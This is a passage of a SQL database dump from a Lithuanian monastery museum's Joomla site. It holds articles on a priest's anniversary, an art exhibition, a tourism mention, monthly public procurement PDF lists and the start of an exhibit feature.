auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Kleboną sukakties proga sveikino Jo ekscelencija Šiaulių vyskupas Eugenijus Bartulis, Lietuvos Respublikos Seimo narė Alma Monkauskaitė. Kelmės rajono savivaldybės administracijos direktorė Irena Sirusienė sveikindama jubiliatą įteikė rajono savivaldybės mero padėkos raštą, Tytuvėnų seniūnijos seniūnas Romas Čerkauskas užrišo proginę juostą. Taip pat kleboną sveikino rajono garbės pilietis Jonas Jagminas, Tytuvėnų apylinkių seniūnijos seniūnas Valdas Ivanauskas, parapijiečiai ir daug kitų svečių. Šventė prasidėjo Šv. Mišiomis, o veliau tęsėsi vienuolyno refektorinėje salėje.<br /></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Nuotraukos Romano Biliaus.</span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=5 orientation=horizontal width=300}stories/naujienos/50{/gallery}</span></span></span></p>',1,0,0,44,'2016-04-14 09:18:58',135,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2016-04-14 09:18:58','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/50\\/main\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,113,'','',1,3336,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(257,345,'Aplankykite mus 2016-aisiais','aplankykite-mus-2016-aisiais','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Tytuvėnų bernardinų bažnyčios ir vienuolyno ansamblis Lietuvos turizmo rinkos specialistų įtrauktas į sąrašą vietų ir renginių, kuriuos verta aplankyti 2016-aisiais.<br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Daugiau informacijos rasite adresu <a href=\"http://vz.lt/laisvalaikis/pomegiai/2016/01/28/vietos-ir-renginiai-lietuvoje-kurias-verta-aplankyti-2016-aisiais\" target=\"_blank\">http://vz.lt/laisvalaikis/pomegiai/2016/01/28/vietos-ir-renginiai-lietuvoje-kurias-verta-aplankyti-2016-aisiais</a><br /></span></p>',1,0,0,44,'2016-01-31 18:46:33',135,'','0000-00-00 00:00:00',0,135,'2016-01-31 18:46:33','2016-01-31 18:46:33','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/sarasas.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,121,'','',1,3126,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(258,346,'Šiaulių dailės mokyklos mokinių darbų paroda','siauliu-dailes-mokyklos-mokiniu-darbu-paroda','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Šiaulių dailės mokyklos mokinių darbų paroda.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Tytuvėnų bernardinių vienuolyno bibliotekos salėje.<br /></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Kviečiame apsilankyti.<br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">1<img src=\"images/stories/naujienos/mokiniu_paroda/2016 01 040.jpg\" border=\"0\" alt=\"\" /></span></p>',1,0,0,44,'2016-02-08 06:50:30',135,'','2016-02-08 06:52:33',135,135,'2016-02-08 06:52:33','2016-02-08 06:50:30','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/mokiniu_paroda\\/paroda.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,0,120,'','',1,3058,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(259,347,'Mažos vertės pirkimai 2016 m.','mazos-vertes-pirkimai-2016-m','','<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2016/mazos_vertes_sausis.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2016/mazos_vertes_sausis.pdf\" target=\"_blank\">Mažos vertės pirkimai. Sausis.</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2016/mazos_vertes_vasaris.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2016/mazos_vertes_vasaris.pdf\" target=\"_blank\">Mažos vertės pirkimai. Vasaris.</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2016/mazos_vertes_kovas.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2016/mazos_vertes_kovas.pdf\" target=\"_blank\">Mažos vertės pirkimai. Kovas.</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2016/mazos_vertes_balandis.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2016/mazos_vertes_balandis.pdf\" target=\"_blank\">Mažos vertės pirkimai. Balandis.</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2016/mazos_vertes_geguze.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2016/mazos_vertes_geguze.pdf\" target=\"_blank\">Mažos vertės pirkimai. Gegužė.</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2016/mazos_vertes_birzelis.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2016/mazos_vertes_birzelis.pdf\" target=\"_blank\">Mažos vertės pirkimai. Birželis.</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2016/mazos_vertes_liepa.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2016/mazos_vertes_liepa.pdf\" target=\"_blank\">Mažos vertės pirkimai. Liepa.</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2016/mazos_vertes_rugpjutis.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2016/mazos_vertes_rugpjutis.pdf\" target=\"_blank\">Mažos vertės pirkimai. Rugpjūtis.</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2016/mazos_vertes_rugsejis.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2016/mazos_vertes_rugsejis.pdf\" target=\"_blank\">Mažos vertės pirkimai. Rugsėjis.</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2016/mazos_vertes_spalis.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2016/mazos_vertes_spalis.pdf\" target=\"_blank\">Mažos vertės pirkimai. Spalis.</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2016/mazos_vertes_lapkritis.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2016/mazos_vertes_lapkritis.pdf\" target=\"_blank\">Mažos vertės pirkimai. Lapkritis.</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2016/mazos_vertes_gruodis.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2016/mazos_vertes_gruodis.pdf\" target=\"_blank\">Mažos vertės pirkimai. Gruodis.</a></td>\r\n</tr>\r\n</tbody>\r\n</table>','',-2,0,0,43,'2016-02-09 06:34:38',135,'','2017-01-03 21:31:14',135,0,'0000-00-00 00:00:00','2016-02-09 06:34:38','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',10,0,0,'','',1,1522,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(255,343,'Mažos vertės pirkimai 2015 m.','vieieji-pirkimai-3','','<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2015/mazos_vertes_sausis_2015.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2015/mazos_vertes_sausis_2015.pdf\" target=\"_blank\">Mažos vertės pirkimai. Sausis.</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2015/mazos_vertes_vasaris_2015.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2015/mazos_vertes_vasaris_2015.pdf\" target=\"_blank\">Mažos vertės pirkimai. Vasaris.</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2015/mazos_vertes_kovas_2015.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2015/mazos_vertes_kovas_2015.pdf\" target=\"_blank\">Mažos vertės pirkimai. Kovas.</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2015/balandzio_men_mazos_vertes_pirkimai.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2015/balandzio_men_mazos_vertes_pirkimai.pdf\" target=\"_blank\">Mažos vertės pirkimai. Balandis.</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2015/geguzes_men_mazos_vertes_pirkimai.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2015/geguzes_men_mazos_vertes_pirkimai.pdf\" target=\"_blank\">Mažos vertės pirkimai. Gegužė.</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2015/birzelis_mazos_vertes_pirkimai.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2015/birzelis_mazos_vertes_pirkimai.pdf\" target=\"_blank\">Mažos vertės pirkimai. Birželis.</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2015/liepos_men_mazos_vertes_pirkimai.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2015/liepos_men_mazos_vertes_pirkimai.pdf\" target=\"_blank\">Mažos vertės pirkimai. Liepa.</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2015/rugpjucio_men_mazos_vertes_pirkimai.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2015/rugpjucio_men_mazos_vertes_pirkimai.pdf\" target=\"_blank\">Mažos vertės pirkimai. Rugpjūtis.</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2015/mazos_vertes_pirkimai_rugsejo_men.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2015/mazos_vertes_pirkimai_rugsejo_men.pdf\" target=\"_blank\">Mažos vertės pirkimai. Rugsėjis.</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2015/mazos_vertes_pirkimai_spalio_men.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2015/mazos_vertes_pirkimai_spalio_men.pdf\" target=\"_blank\">Mažos vertės pirkimai. Spalis.</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2015/mazos_vertes_pirkimai_lapkricio_men.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2015/mazos_vertes_pirkimai_lapkricio_men.pdf\" target=\"_blank\">Mažos vertės pirkimai. Lapkritis.</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2015/mazos_vertes_pirkimai_gruodzio_men.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" style=\"border: 0;\" /></a></td>\r\n<td><a href=\"images/stories/viesieji_pirkimai/2015/mazos_vertes_pirkimai_gruodzio_men.pdf\" target=\"_blank\">Mažos vertės pirkimai. Gruodis.</a></td>\r\n</tr>\r\n</tbody>\r\n</table>','',-2,0,0,43,'2013-02-20 06:06:04',135,'','2016-01-06 19:18:24',135,0,'0000-00-00 00:00:00','2013-02-20 06:06:04','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,0,0,'','',1,506,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(262,350,'Laiko ženklai','laiko-zenklai','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">LAIKO ŽENKLAI - tai naujas skyrelis mūsų puslapyje, kuriame pristatysime laiko ženklu pažymėtus eksponatus.</span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Kovo 4 dieną Tytuvėnų bernardinų vienuolyne  POEZIJOS SKAITYMAI skirti kun. Ričardo Mikutavičiaus atminimui, tad LAIKO ŽENKLUOSE pirmasis eksponatas ta proga-kunigo Ričardo šeimos relikvija.</span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><strong>APAŠTALINIS PALAIMINIMAS</strong></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Popiežiaus Pijaus XI apaštalinis palaiminimas Antanui Mikutavičiui jo žmonai Jadvygai ir dukrai Liucijai. Palaiminimas- pergamentinis pažymėjimas  su 